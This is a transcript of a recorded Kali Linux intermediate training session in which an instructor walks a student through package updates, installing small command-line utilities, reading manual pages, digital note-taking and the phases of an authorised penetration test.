1:43
2025-08-01 09:20:57
3:21:34
2025-08-01 09:23:06
3:24:40
2025-08-01 13:02:23
52:46
2025-08-02 09:03:25
4:52:32
2025-08-02 09:56:41
Visit the Kali Linux Intermediate course recordings page
WEBVTT
-->
at our own leisure.
-->
Okay, good.
-->
Interesting.
-->
So, Roger, now, this is going to be a data subrecording that's happening
-->
that is being stored on reference machines.
-->
We can also include Zoom share.
-->
Yes, it could be Zoom share.
-->
Anything that happens directly on his local workstation.
-->
The only correction I'll have to say is the recording is not actually happening.
-->
It's not being stored on his machine.
-->
It's being stored on our servers.
-->
Okay.
-->
So, I don't have to do anything in my Zoom for recordings, that's what I was just looking at.
-->
I don't know, I mean, you can duplicate recordings if you want, I just don't know how much resources are going to take.
-->
I'll let you do it.
-->
So, yeah, let the desktop run the show, I guess.
-->
Run the show with the desktop.
-->
Okay, ready?
-->
So, Rander, you're going to stay here for, I guess, when it's comfortable.
-->
I'm going to leave you my mobile number with both of you, if you run into any issues, call
-->
me.
-->
Okay.
-->
It's 860-478-7278.
-->
Okay.
-->
good luck for the training again any issues let there are my test noise brother is not on
-->
all righty then okay thank you all thank you very much so just before you guys start if you look at
-->
the top right in your screen I just sent the message to our little chat window so if there's
-->
any real like issues there you could always copy and paste or messaging through there but i'll have
-->
you guys open for a bit i'll watch for a watch for a bit and then uh i'll meet myself and then
-->
if everything looks like it's moving smoothly then i'll end up hitting the call okay but if
-->
you could always message me through there yes sir good luck thank you good morning donna how are
-->
you. Good morning, Dr. West. A lot of technology going on there. Yeah, yeah, we got some stuff
-->
going on here. What about this week in the world? Holy smokes. Man, this world is crazy, isn't it?
-->
Yeah, the NNSA got hacked on Monday, the Windows server. Crazy, right? Through the back door,
-->
the DLL file, SharePoint. Yeah, there is one government agency that I know of that surprised
-->
me um they're getting rid of all of its windows stuff thank god and all right um windows needs to
-->
be bulldozed windows have some serious issues so let me put this over here and so you know linux got
-->
hacked as well the cheroot there and the vms have new four new cves it's crazy right and i wrote a
-->
paper like how vms are going to have security how security layers layers of defense are going to
-->
apply to vm it's already happened it doesn't exactly because we we we use linux to hack into
-->
windows systems and now if they go from windows to linux it's just going to make it easier it just
-->
doesn't matter whatever the world decides to go to an organization the the bad guys have a way in
-->
if we if we screw up our defense in depth our um hardening and we lapse for a day that's it
-->
because everything is automated today yes right yes and you know on the 19th a new ios patch
-->
came out for apple with 24 new cbes i don't know you're probably an android guy
-->
yes me yeah i i just that i just saved it saved the number okay thank you oh okay bye
-->
that was managed okay i'm back my niche good yeah so yeah anyway so times are getting it's
-->
getting harder and harder to be a human so how do we protect ourselves that's a great question
-->
And it's a great question.
-->
And you don't tell people, hey, I'm protected because you'll be the new target.
-->
Exactly.
-->
They will somehow, someway get in if they're not already in already.
-->
All right, then.
-->
So have you done, Donna, have you done any pen testing at all in your life?
-->
I've been in cyber labs where we use Wireshark and we use all the tools, but it is not extensive enough to walk away with any knowledge because you have to move on to the next lab so fast.
-->
You can't lose time. So you don't have time to piddle around with each type of software you get introduced to because in the next lab, you're teaching yourself a whole new platform of software.
-->
so you just got to keep moving forward so yes and no you know yes i have but not extensively
-->
okay so the one of one of my goals when i teach pen testing is to teach people how to think
-->
so that you can do it on your own immediately right and what that's a little bit of a process
-->
for us, but it's going to be fun. First thing I do in every pen test course that I teach
-->
is I teach, I show this. All right. So we're going to have the orange jumpsuit discussion
-->
because I teach a lot of teenagers, even military and adults, and the boys and the girls,
-->
especially the boys, they are big on, I just want to attack and get inside the network.
-->
wait a minute do you know what penetration testing really is you know i'm putting on my
-->
sizzle hat i'm putting on my sock manager hat i'm even putting on my special agent hat um
-->
we don't brag because we got into an organization when we actually hack into an organization
-->
successfully that is not a good day tracking in my mind red team is really blue i've actually had
-->
that discussion at um illinois institute of technology a few years ago red team is really
-->
blue. Why? Because we write reports at the end of a penetration test. In order to conduct
-->
a penetration test, we must have written permission. We need to understand the scope of the pen
-->
test. There are a whole lot of other things we should do too. Let me see. I want to say
-->
i have some of this stuff written out report writing and post-test actions okay um i actually
-->
went through the ec council's c pent course certified penetrate that's their top dog
-->
penetration testing course it hit me upside the head i learned so much
-->
can you look at my test because i plan on testing for that i missed the first part
-->
i said do you think it's a worthy certification then because i plan on testing through the ec
-->
council for peh oh yeah yeah check uh peh oh okay so look at this so i'm gonna show and tell and
-->
you're going to do in town so i think that's a low number but that's um now when you ask that
-->
question um whether it's worth or what the value is of something that is a relative statement it
-->
really depends on what you consider valuable some people think money is of value and oh my god yeah
-->
and then there are other people who are like um no it's very valuable to make sure my organization
-->
is safe that these people are safe so um this is probably not accurate in in because where i
-->
live in virginia i would argue that that could probably be twice as much and just to show you
-->
an example the GWAP certification through sans usually pays double I've seen double this amount
-->
it's pro I haven't looked here in a long time but there was a link that literally showed it paid
-->
about 205 000 a year depends on your experience depends on who you know etc etc with that
-->
with that said there are a lot of um pen test certifications
-->
let me try to break it down and categorize them in two categories for you yeah i know these okay i
-->
I know where you're going. I get it.
-->
So we have theory tests where you have to memorize and hopefully get the answer correct.
-->
And then we have the practical side.
-->
All the CompTIA tests are the memorizing and then all the practical is why I'm here.
-->
Correct. So what we're going to do, as a matter of fact, let's work and talk simultaneously.
-->
Can you please open up your terminal?
-->
you have things to do in front of me that go along with what we just need to do if we were
-->
doing the job. And we can talk at the same time because some things will require you maybe to
-->
install stuff. And I want to show you how as well. And I'm also going off about a little
-->
cheat sheet here. I'm going to give you, I'm going to do my best to give you exactly what
-->
you ask for so how do i get into my screen oh the desktop because i see your screen now i see you
-->
your face and your your screen i can't get into mine seems like so you're going to have to work
-->
on your computer do you have two screens on one i have one oh oh okay so so that's the thing i
-->
minimize uh pull up your one screen and then um did you see the desktop yet
-->
i see yeah i see the desktop but i don't have it's under your control i can't get it
-->
how do i get it no no no no um minimize this screen and pull up your the desktop
-->
okay there we go okay now yes now open up a terminal uh you can either right click and click
-->
open terminal or you can click on the little black box next to firefox up there right there
-->
yay now i just can't see it i'm gonna go big all right i'm here okay so you won't be able to see
-->
the zoom screen, you can see your personal screen. Yeah, I can hear you. That's okay. Okay.
-->
If we had, that's what I was going through earlier. So I have two, I have three, three
-->
screens. One where I see you, one where I can see the desktop and I have another one where I can see
-->
my desktop as well. So what I would like for you to do is make this screen larger, right? The
-->
terminal so I want you to press control shift plus plus plus make sure you're
-->
inside the terminal otherwise it won't work yeah I'm up to 150% you want bigger
-->
oh I didn't see any change on my end are you not change at all I did control
-->
now control shift plus plus plus hey there you go beautiful yay good now do you know how to
-->
update your terminal i believe i did that um but let's uh let's go through it okay so check this
-->
out in this world when or if you don't know anything the foundation for success is research
-->
most of the actual hackers that i know that have actually been arrested that i and i just know
-->
real live hackers they never sat in any class they didn't pick up a book they just started
-->
googling and trying stuff i learned a lot about that so you're going to type um sudo do you know
-->
what sudo means yes okay can you tell me at least two definitions or acronyms um it is just um an
-->
administration file to get to wake up the terminal okay so what does s-u-d-o mean it is a root
-->
command not that like the literal letters what does pseudo mean
-->
question ah okay so go ahead and type pseudo we're going to find out in a minute space apt space
-->
update press enter yay so what we're doing is we're updating all of the different packages
-->
and programs within the terminal so if we're going to do an actual live pin test we definitely need to
-->
make sure we have the latest packages so this is a mandatory thing that every pin tester needs to do
-->
every security administrator needs to do so this is something um uh that you want to write down
-->
someplace in your notes the what are you using to take notes i have a notebook right here how
-->
about digital notes um i memorize it usually okay i'm going to show you something okay
-->
all right by the way hit the up arrow one time backspace and erase date the backspace button
-->
erase the word date type in the word grade g-r-a-d-e space tack y or dash y
-->
dash y press enter there you go after you do an update you must do an upgrade they come together
-->
as a package okay so i know your hand written notes are going to be fantastic but the reason
-->
why i want to show you how to take digital notes is because as a pen tester is much faster manual
-->
pen testing is something that a lot of pen testers really don't do unless they absolutely have to
-->
they're going to um do automated pen test we're going to learn manual pen tests because that's
-->
the foundation before you get to all that those fancy tools that are out there um there are
-->
organizations out there that they will sell you these tools and they're upwards of twenty five
-->
thousand dollars or more and then what the pen test the dark side community or the really good
-->
pen testers is they make their own tools they go to python they start making the whole bunch
-->
of different tools and they just go off and they just save the world and look at this this upgrade
-->
takes a while. So it's a good idea that is really good that we're showing this. When this finishes,
-->
I'm going to show you something. Feel free to either type the question or ask questions so that
-->
you have full understanding for anything. Okay? Yes, sir. Fantastic. All right. So when we open
-->
up, you're going to do a brand new pen test and we're actually about to do some actual work.
-->
remember pseudo apt update so i'm going to kind of help you out a little bit i'm going to google
-->
can you see it no you don't see my screen anymore okay because you're on your terminal
-->
let me see mine okay so then let's do this then oh good click on the firefox icon
-->
Yeah, you got ambitious. You got a lot of them click either. Yeah. Yeah. Yeah. Yeah. Yeah. Go ahead and close one of
-->
Blue X in the top right
-->
Oh, but it's like oh, there we go. There you go
-->
Now go inside the browser of that Firefox
-->
Just click in the browser. Don't worry about anything else
-->
There you go. And you're gonna type a simple question
-->
question what does pseudo mean in linux you you put it on chat it's fine too and uh what does
-->
pseudo mean in linux okay now i'm gonna let you turn user do i should have known that or
-->
substitute user do yes so it's just something that you should know as a uh cyber security
-->
professional doing pen testing right so we're adding bullets to the things that you'll learn
-->
now i need you to type in what does apt mean in linux so now i would like for you to read
-->
the command to me with the translation that you just learned pseudo apt um update what does that
-->
mean so it is uh super user do for advanced tool package uh updating the software packages that are
-->
already on cali right so the literal translation is super user do advanced package tool update and yes
-->
you just finished it off with the end fantastic and then of course the upgrade uh we the reason
-->
why we put the dash y on it in is because we're telling the program yes in advance because when
-->
we do the upgrade it'll ask do you want to continue with this installation you have a choice yes or no
-->
okay so that's basic scripting right um so now i want to go back to the terminal
-->
click on a terminal right behind it let me know when you're there hit the up arrow press press
-->
ctrl a what happened when you did that it's the upgrade feature no press press ctrl e now and
-->
watch watch the cursor now press ctrl a again move the cursor back and forth right so a brings it to
-->
the beginning e brings it to the end now i want you to use the arrow and put it on top of the a for
-->
apt one two three four five arrow it's not loading the cursor the arrow the arrow there you go got it
-->
type in the word full f-u-l-l no i'm sorry backspace that put the full on top of the u for upgrade
-->
use the arrow key the mouse won't work so you got to use the arrow key because you're in linux
-->
now put a dash full dash upgrade no space oh
-->
right but no space no space so take the goal um put the cursor is that i can't see like uh
-->
i can't hang on now i lost it oh you can't see like your terminal so this is what we'll do i'll
-->
stop sharing you share your terminal and I'll work from here stop share you go
-->
ahead and share go actually I don't think that's gonna work either because
-->
you still need to be typing on your desktop right my desktop so this okay
-->
so where's hi hi again share where's my screen um hold on um let me share god let me share my screen
-->
again i i i think i see what's going on here screen three share okay um i'm thinking okay
-->
so there i was but it disappeared and um i'm gonna hit share no but i already did
-->
all right so do you see me do you see my screen that i was now now now i see your screen let's
-->
work it like that and i'm gonna move mine over here so i can see both screens you're gonna do
-->
all the work okay yeah now good now take the space out of full or after you just had a little
-->
bit mm-hmm uh dana your um your browser windows very zoomed in if you hold control and use your
-->
mouse wheel to scroll down okay so can you guide me to where my screen went oh you went back pretty
-->
It's probably the desktop, right?
-->
Yeah, go to the desktop login.
-->
I think you can back to the middle tab of your browser window.
-->
So this is the Zoom call.
-->
Go to the one that says the desktop participant join.
-->
You can close that.
-->
Don't close the Zoom window.
-->
I've got two of them up. All right, so...
-->
Okay, so if you could just...
-->
The one that says desktop login here, if you look at the top of your browser tab.
-->
Yes.
-->
So the top that says desktop login here at the very, very top of the browser window.
-->
Or you could hit...
-->
Here, okay, so...
-->
Oh, so the tab itself. So you're currently in this tab, I want you to go to the third tab.
-->
Yeah, it's just cute.
-->
So your mouse is, are you having issues with your mouse right now?
-->
Yeah, it is just acting bizarre, so I don't know.
-->
You can do control three.
-->
Okay, so you see it?
-->
Yeah, if you could log, I guess you could log back in or you could hit forward.
-->
It looks like you went back a few times.
-->
But yeah, you log back in, yeah.
-->
The course itself, it says organization course thing, yeah, right here.
-->
so now i'm closing up the space there you go hit the backspace again hit backspace twice
-->
now put a dash now put a dash uh now press uh enter i'm just gonna keep this screen here so
-->
and not mess around with it okay i'm ready all right now um there are various types of uh thanks
-->
roger there are various types of um commands you're going to need to find a list of update
-->
and upgrade commands for kali linux can you go to um firefox right there in your tab and let's find
-->
that can i look at can i use chat gpt um yes you can um when you when it comes to research
-->
if you're in an environment let's say you work in a sock and you're a pen tester there
-->
they may not have chat gpt so i want you to when you do research google it click on images
-->
videos and um of course ai software are excellent resources and there's more that you can add for
-->
that so go ahead can you yes you can you can research it any way you can but i'm going to
-->
show you why you want to do it the way i in a minute as soon as you find that all right so
-->
what are upgrade commands for linux is what you wanted me to ask i'm asking google cali linux
-->
just type in cali cali linux update and upgrade commands list or commands you want the list
-->
you want the list i want the list yeah well i have the brain all over the place i just okay
-->
i have it okay fantastic okay how many do you see a lot yeah well yeah so these are things that
-->
you are expected to know if you're going to be pen testing in the real world and i just wanted to
-->
show you uh i wanted to show you what they are um if you don't mind can you copy the list if it's
-->
small enough put it inside the chat so i can see your list i'm a little bit disadvantaged because
-->
i can't see the screen the way i normally could dr weston you can also open up one note in
-->
in uh your desktop here so yes i know yeah display yeah okay i um i actually want to get her to
-->
do it i have a reason
-->
okay no worries okay well thanks i'm gonna close this
-->
um donna did you put um do you do you know where the chat is or you don't know
-->
the same list i have a broken up um like a bunch of different commands so i'm gonna do
-->
use that and go to firefox is there a url that you can put in there
-->
um it's it's a lot quicker that way i can just click on it
-->
no i don't okay here we go i'm going to show you
-->
something okay yeah i'm gonna um
-->
okay let's come over here that's what i hate google never gives you a list of
-->
anything it's just a convoluted nightmare so i don't have a list i have a bunch of commands um
-->
this is in gpt right oh my god i got it all right okay let's see i got a copy
-->
best way to do this is here oh i can't type okay let's do it this way it's just that i can't see
-->
the screen minus a little bit tiny too all right so maximize your screen again
-->
if you remember that x that i told you to click but then i keep and you can always escape out of
-->
here to go back okay like you want this one how's that oh that's fantastic oh that looks like the
-->
the whole directory um um then updates command line guide I'll just Google that
-->
is a big man that's with Linux blog and then I'll get this I have the URL now oh yeah that's
-->
I mean, that's, you know, a bunch of different packages that are actually updated on that particular update.
-->
But underneath it, you know, we are. OK.
-->
OK, so depending on the flavor of Linux that you're using, by the way, Kali Linux is a Debian, D-E-B-I-A-N flavor.
-->
They use the APT or advanced package to command.
-->
command so that's why we type in sudo apt update or upgrade or full upgrade etc okay but if you're
-->
actually using a tool such as uh debian on ubuntu use the same but if you're using something like
-->
like red hat or fedora then they're going to use the dnf command to replace apt we cool
-->
Yep, I'm with you.
-->
And if we're using BlackArch Linux or Arch Linux, we'll replace APT or DNF with Pac-Man.
-->
So it behooves us to understand and know the flavor of Linux that we're using so that we can actually apply the appropriate package tool upgrade feature.
-->
Yes, sir.
-->
Okay, good, good, good, good.
-->
Okay, so now, do you know how to find your IP address?
-->
Not exactly.
-->
Okay, just type in the word.
-->
So, okay, hold on.
-->
Let me show you this real quick.
-->
I've got to show you this.
-->
How do I show you this?
-->
Because I need to, I can't show you on this screen because it's too small.
-->
So I'm going to need you to just find the stop share button, stop sharing.
-->
I'm going to share my screen real quick, and it will come back.
-->
Fantastic. So, I'm going to share my screen. Hit the share button. Share screen three. Share. Okay. Can you see my screen?
-->
Yes, sir.
-->
All right. I'm going to come back over here and I'm going to type pen test.
-->
Today, we're going to do several pen tests and we're going to be a little bit aggressive with it because I want to make sure we can get in all the boxes.
-->
But I want to answer all your questions. What I want you to do is to look at, say, some of the previous pen tests that I've done in my life.
-->
um this is actually info set prep which is oscp certification and look at how i took my notes
-->
it's a little tiny on purpose but i can make it bigger so i documented the project or the task
-->
the objective um i documented the actions or the screenshots the commands the basic information
-->
and definitions and what I learned. Because remember, we are actually testing someone's
-->
security defenses, hence penetration tests. In other words, back in the day, I used to
-->
do pen tests, physical pen tests of the airport. This is before 9-11. And I'm looking around to
-->
study how these people would leave the door and they would close really slow and then i would walk
-->
over there real quick and and i would drop something and leave it like a little hard item
-->
and then i walked back over and push it with my foot and when someone left and they closed the door
-->
it wouldn't close all the way and then i walked over and said oh man what's this and i picked it
-->
and walked inside and i got in the airport very successful right um it was it's crazy right it's
-->
that that is um an example of how we get in we sit on the side and we look at
-->
um we look for vulnerabilities right when i'm sitting on the side i'm information gathering
-->
So I'm sure, are you familiar with the penetration testing step?
-->
Well, recon being the first one, like you're saying.
-->
Right?
-->
So reconnaissance, information gathering, they kind of fall in the same boat.
-->
There's passive information gathering and then active information gathering.
-->
You know, passive, I was just sitting on the side, hanging out and taking notes, right?
-->
Active is when I'm starting to actually start to touch and feel.
-->
you know maybe i'm looking for hey this door is unlocked you know that type of thing and if i
-->
walked in and someone saw me hey man this door was unlocked i was just trying to let somebody know
-->
but i was really trying to get in so if i got busted i had to come up with a tagline to get
-->
out of the situation okay um so yes um when i i need to show you how to take these notes
-->
like this. Today, we're going to do it the hands-on way. Then tomorrow, we'll start to
-->
use different tools to take notes for us. You need to understand the basics from the beginning.
-->
These are a variety of different pen tests. And I can show you how to do this in your OneNote.
-->
Or I can even show you myself. And I'll add a page real quick. And I'll just put
-->
um donna pen test let me show you how to use one though okay and i'm just gonna say uh
-->
project name tab it over commands tab i'm saying these words on purpose right um
-->
screenshots tab analysis tab lessons learned then I'm going to press enter to give me a new line
-->
and let's say today we're going to do basic pen testing tab and then I'll come over to lessons
-->
learn press enter and then i'll put in um let me see um information gathering or reconnaissance
-->
you can spell that right and fix that even before i do that i'm gonna i'm gonna i'm doing this on
-->
purpose i'm gonna go to table and i'm gonna add a row below so if i missed something i can just
-->
put in here let me see um rigid for written permission and maybe i'll add another line
-->
below and say uh scope of work i can go on and on right as i continue here then i can talk about um
-->
um, denumeration, uh, maybe, uh, exploit, uh, oh, enter exploitation, um, um, um, whatever
-->
our phases are, so let me see, phase, pen test, pen test, let me go to Google, because
-->
i don't know where i have it move this here up there pen test uh i don't know if it's phases or
-->
i don't know why i asked the word for the day so here we go reconnaissance scanning
-->
vulnerability analysis exploitation post exploitation and reporting
-->
depending on the certification you're learning the names or the the phases will be slightly
-->
different ceh is different from pentest plus both of them are different from c pent they may be
-->
slightly different from oscp do you understand yes fantastic i just want to make sure you
-->
Why is that over there?
-->
I just want to make sure you understand that there are some differences.
-->
We adapt and overcome no matter what they are.
-->
We do.
-->
So now we have that.
-->
I'll come back to my OneNote really quickly.
-->
Commands.
-->
Let's just say, let me add a new line.
-->
Table, insert below.
-->
Right?
-->
Let me see.
-->
Update.
-->
and upgrade commands this is just an example not exactly like it belongs here but i'm going to type
-->
sudo apt update you can even combine the commands two ampersigns sudo apt upgrade tag y
-->
right stress this out if i need to i come here and i'm actually on my terminal on my computer
-->
now on purpose because i want to make sure it's big enough so you can see it so if i type my command
-->
apt update control e press enter it goes through its process and now okay i see what i need to see
-->
i go back to my one note screenshots go to insert screen clipping highlight what i need
-->
let it go this is the old-school manual pen testing right analysis I upgraded
-->
the machine I updated and upgraded I'll say Linux to ensure all packages were
-->
are ready for the pen test see how that works yep fantastic i'm hoping that this is helpful
-->
for you because when i teach my students um do you see how many pen tests i have here
-->
and actually it's not a lot there i have a lot of tests here where i make them take notes from the
-->
beginning because everyone wants to pen test but no one wants to take notes so
-->
let's just I like I like how yours is in block format the old school because we
-->
just got out of operating systems where we had to APA report our screenshots and
-->
it's a drag because this is the real way to do it right so check this out let's
-->
just say, I'm going to type Splunk. This is when I installed Splunk Soar. I have screenshots
-->
galore, everything that I do. Sometimes I've installed Splunk Enterprise. Any and everything
-->
that I do, let me see. Go off to the SOC, take screenshots of the work, have the answers.
-->
As a SOC manager, you must take digital notes while doing the work, period, is for your report.
-->
Because of the timestamp, yes.
-->
All kinds of reasons.
-->
In one note, I taught within the Alabama Cybersecurity Fellowship.
-->
I'm able to share this with the team so I can keep up.
-->
I gave them all their tasks.
-->
I'll put an example. These are all the people that are here. I have a whole bunch of different
-->
tasks here. Look at the screenshots of all the work they've done. Why did I do this? Because
-->
when I was the SOC manager and the CISO in the government, we had OneNote. That's one.
-->
Two is OneNote, I had the ability to sync books and share them with my team.
-->
When I was off site and needed an update, I could pick up my government phone on my laptop and I can actually scroll in and see who did what worked.
-->
Because the goal for me when I teach students is to turn schoolwork into work.
-->
when you we get out of the everyone wants to be shown how to do it i want my students to show me
-->
how to do it i'll sit here like this and say what are you thinking this is what i'm thinking
-->
and then you're going to research it and you're going to do it i have a whole formal process
-->
that has nothing to do with no prob outside of here but what i need you to do is to actually
-->
do that here on your one note so i would actually
-->
i think what i'm going to do right now is not share my screen and i want you to make
-->
your screen full let me see if i can do that how do i do that
-->
so the bottom at the bottom right of her uh team you can hit the x
-->
or you can pop it out
-->
of her pain or my pain
-->
I want to not share my screen
-->
yeah you can just
-->
see her screen is that what you want to share
-->
her screen okay alright
-->
I got you so I'll make her screen
-->
uh oh bigger
-->
can you pop it up you can make that you can maximize
-->
your screen now okay well can she
-->
see her screen big like this
-->
she could do that too
-->
um Donna are you
-->
able to maximize your screen via
-->
the X at the bottom of your pain
-->
no because it's like it's on his screen now so maybe i can oh yeah okay so yeah it's on dr wess's
-->
so i need it to flip back to mine and then i can hit the x yeah how about now i mean i'm still seeing
-->
yours but um i just i just clicked on the word interactive there we go now something's happening
-->
i did something because what i'm seeing is just the zoom link
-->
same so i see yeah okay so you you just see the zoom link i don't know so you gotta just minimize
-->
minimize zoom and go back to the desktop yeah yeah and then i can shrink it with control
-->
how do i shrink how do i shrink the size the size of the browser or the journal
-->
Okay, that's all right. I'll use it like this. All right. I'm ready. Thank you. Can you just click on
-->
If you click on a full screen will that make will that take over my screen?
-->
So that's what I'm hoping it would do. I have a full screen right now. You do
-->
Okay, that's fine
-->
I got it now long as she has a full screen. I'm good
-->
Okay, let's get into this pen test, right?
-->
Um, one of the things that
-->
uh using update update updating kali linux so you kind of have that cheat sheet you know how to do
-->
that and you've also a chat gpt-ing it i want to make sure you understand that can you yes i
-->
understand can you show or tell me how to install kali linux from scratch if you have to do this in
-->
the real world well yeah i would i would uh create a new vm and put um kali in it okay it's not
-->
really i mean so you know how to do that yes sir okay um i have written instructions on how to do
-->
that with my screenshots that's why i asked but you can google them anyway so we we are covering
-->
the introduction portion um i i have cali already on a virtual machine and i have parrot already on
-->
a virtual machine fantastic um okay um by the way in the in the if you want to sit for a ceh exam
-->
or any ec council exam they require you to use parrot security versus um cali lennox that was
-->
a new change a few years ago so it's a really good idea to learn how to do installations
-->
you know um like um on this machine right here can you install steam locomotive real quick
-->
do you know how to do that um no because no this is good i mean i know that you type it in and hit
-->
yes but i don't know like how you we're going to get you to know it that's fantastic let's do it
-->
click on our firefox real quick and i want you to type that question how to install steam locomotive
-->
on cali linux just so you know this is all pin testing even these installations to install steam
-->
locomotive calendar which is a debian ppt scroll down show more okay do you see that command right
-->
there sudo apt install sl yes sir go ahead and type that in case sensitive so make sure it's not
-->
capitalized i see that sudo now i lost my firefox case um go ahead get it yeah i don't i don't have
-->
I lost my firebox oh sure apt space install space SL got it enter okay something is happening it
-->
looks like it's actually working okay now type SL in period let me enter SL enter yes there you go
-->
you just install steam locomotor um not terribly difficult to do is it you just need to know how
-->
you can also uninstall it or remove it by just replacing install with remove so these are
-->
basic things that you're going to know you may find yourself in a situation you're doing a pen
-->
test and you have to install something you need to know how to do that right yes i do it's just that
-->
we can we keep switching back between linux commands like i go to fedora i have one then
-->
i go to ubuntu i have another then i go back to cali i have another so i don't have them
-->
committed to memory so i always pull up the list good the cheat sheet yeah don't worry about
-->
committing it to memory the muscle memory will come the foundation the the basement of a house
-->
right is to research it period yeah right in in time oh yeah you're going to memorize it you're
-->
going to spit it out just like i'm doing it um what i try not to do um the my methodology of teaching
-->
is you do the work you're going to teach me and uh i'm going to learn from what you do and teach
-->
then i'm going to do the same thing so um now i want you to install rig well go ahead and do it
-->
rig rig and looks like you do the command how do you run rig how do i run a rig no how do you run
-->
what you just installed yes no look at what's happening what did you do with the steam locomotive
-->
that's the steam locomotive now i want you to run rig i gotta type in rig there you go i got it
-->
yes sir fantastic okay now i want you to show i'm going to show you another way to install a command
-->
okay type in tl dr it may not work press enter okay see it and that's why see what it says teal
-->
deer just type in the word teal deer not the apt stuff oh keep it together type what you see
-->
remember the words are together backspace third line till till deer press enter oh it didn't work
-->
yeah okay type in type in um pac-man p-a-c-m-a-n press enter oh see that that's what i was trying
-->
show you is asking you a question say yes yes say yes read it make sure you read it yes okay
-->
the lesson here is to make sure we always read the outputs so as pen testers we need to read the
-->
inputs and read the outputs now type pac-man press enter oh it failed could not create the database
-->
probably because we're on this particular lesson here but that's okay so now hit the up arrow twice
-->
press ctrl a type sudo base apt space install space enter you'll be coming a master at installing
-->
stuff now i want you to go ahead type q deer see what does all right now type tldr press enter
-->
okay that is the command right there that's the shortcut so now hit the up arrow one time space
-->
and type um sl enter okay see the error message um run tldr space tac tac
-->
update to download the cache. So go ahead and type that. Hopefully this works. Okay. Now hit
-->
the up arrow twice. Press enter. Yes. Yes. Have you ever heard of TLDR or TLDR, which means too
-->
long, don't read? Oh, TLDR means too long, don't read. So when you're typing an email to somebody,
-->
you expect them to read a book or do you expect them to read a little caption
-->
and book I like it okay so now the reason why the TLDR is there is because I want
-->
you to type man space SL and press enter enter now that's the manual man is short
-->
for manual you don't understand a normal command you can type this and then you
-->
hit the down arrow keep going down until until it gets to the end is that the end yes sir okay good
-->
now go all the way back up hit the up arrow right so this is actually a short one but the sl was
-->
created because sometimes we want to type ls for list and sl sometimes we we kind of invert it um
-->
and it'll show the manual will show you any command all right they give you a
-->
synopsis of how to use it press q let me give you a longer one type man man space
-->
uh something longer um uh dir press directory yes okay see how much content is there
-->
hit the down arrow that's a lot right that is a lot okay press q okay let's i hope it's short
-->
type tldr space dir enter there you go it's a shortened synopsis of the same thing from
-->
from the the help or the manual have you ever used these before yes good in lab yeah okay so there's
-->
a reason why we want to use these things, right? Of course, you know how to use DIR space tag tag
-->
help or even DIR space tag H. The key here is I'm just trying to show you some things you may
-->
have to do as a pen tester. You may not understand something, you can do it. Have you
-->
ever used april probe before not sure type in um a apr pos a p a p r o p o s press enter
-->
okay now hit the up arrow space um type in like dir press enter
-->
whoo look at all those directories right it's crazy right now in order to truly learn this
-->
you'll have to go to firefox right up there at the top and open up a new tab
-->
plus on the top like top top left plus sign right there
-->
okay type in april pro a-p-r-o-p-o-s space geeks for geeks oh i love geeks for geeks i do too
-->
press enter see what it says april command in linux with examples
-->
yeah click on that we pin testers sometimes need examples right before chat gpt was google right
-->
and yeah so if you went through this entire thing you can teach yourself everything about april po
-->
and be like let me continue my pen test all right i'm trying to show you some things that you may
-->
actually need during the pen testing you understand got it okay so there's more than
-->
just google we don't just google stuff we also don't just chat gpt stuff we use everything
-->
scroll to the top again scroll to the top no no don't take that away just scroll to the top of the
-->
page oh good now click the back button just one time now i want you to click on images
-->
tons of articles that will teach you everything you need to go to quickly learn april pro and
-->
continue with your pen text click on videos right i don't see a whole bunch of articles on that but
-->
sometimes they are then you have on the more and it has a drop down click on the drop down on the
-->
far right next to more that's tools go to more next to news this to the left the word more
-->
thing is there's something blocking right here and you still have to go left go left
-->
you have go back to videos all of this is research stuff that we have to use
-->
versus ignore you understand yes there you go that's all I want to show you so
-->
that we can make sure that when we now the really cool thing is if you had your
-->
one note open you can copy those videos and place them there and keep them for life
-->
so now i want you to go to youtube real quick and hopefully what i want to show you is there
-->
click on youtube.com and in the search bar i want you to type marie m-a-r-i-e
-->
space forleo f-o-r-l-e-o f-o-r-l-e-o l-e-o o-r-l-e-o space psa press enter right now that 52 second video
-->
i need you to click on it and actually listen to it watch it and listen to it wow i want you
-->
to sign in to confirm you're not a bot i just hate it okay hold on i don't know why uh because
-->
you're in your cali um worst cases i can show you over here okay to watch it somewhere else
-->
um that's fine go ahead then okay i'll watch it on uh just open up a new tab
-->
got it on your host machine and then you can come back to it all right got it okay
-->
you want me to watch it right now watch it this seconds because only 52 seconds
-->
i can't see it but go ahead and watch it what questions do you have from that simple sarcastic
-->
relatively funny video none okay i i look up everything that's i mean i spend my whole life
-->
looking stuff up all day long so i concur i get it fantastic so if you're ever so the way pen tests
-->
happen in the government is something in a whole bunch but in the government my pen tester worked
-->
alone but on occasion he worked with a team they um they obtained written permission
-->
They understood the scope. We had a get out of jail free person just in case we saw something
-->
we weren't supposed to see. We reported it immediately. We conducted all of our vulnerability
-->
scans. We followed the whole process from the very beginning. When I meet you, I'm taking notes
-->
because i'm writing a report i am writing a report off of actual things that's done not memory
-->
our great memories lack when it comes to documenting exactly what happened step by step
-->
okay why because we want to get paid as pen testers right especially if you're a contracting
-->
company we need to document everything just in case for some reason they say the government says
-->
well why didn't you document everything is and why didn't you show us this and why didn't you
-->
show us that when you think that's important and then they'll twist it and make you feel like you're
-->
a criminal and they may even be interested in prosecuting you definitely not paying you and
-->
then they go well you know you're really not what we wanted so that's why we take notes from the
-->
beginning because in the end we don't want to have to go back i teach my analyst that from the very
-->
beginning we also need to know our commands right type the um type the word history in your um
-->
and you've typed this command before i presume yes fantastic so that'll show you all the commands
-->
that were typed into this in this shell when you were here now what we need to do my original
-->
question is can you tell me what your ip address is on this machine oh i can find it yeah of course
-->
do you know the command no okay no i what without not looking it up no fantastic so type in find it
-->
i i believe you i know you will i'm not worried because we've done some exercises
-->
by the way um i'm sorry type in um man space rig i wanted to show you what that was
-->
have you ever heard of the random identity generator no but now you have i was just
-->
it's a random identity generator okay go ahead and press q and type in man space sl press it
-->
it displays animations aimed to correct users who actively enter sl instead of lx
-->
i want you to get into uh custom to manning or reviewing the manual for all commands okay press q
-->
um okay um you familiar with pwd press are you familiar with this or is this the first time
-->
password no good guess though um it's actually i want you to man it it was right at the top
-->
don't skip what was at the top now that's where it tells you what it is print name of current
-->
working directory i got it shows you where you are go ahead and cue it okay um right now do you see
-->
that tilde at the end that little tilde in the little brackets yes okay it's showing you that
-->
That's usually the top of the directory, but your home directory is you're in slash home slash student.
-->
Do you know how to maneuver in Linux?
-->
I don't think you do because of what you said, but I'm asking.
-->
Probably not.
-->
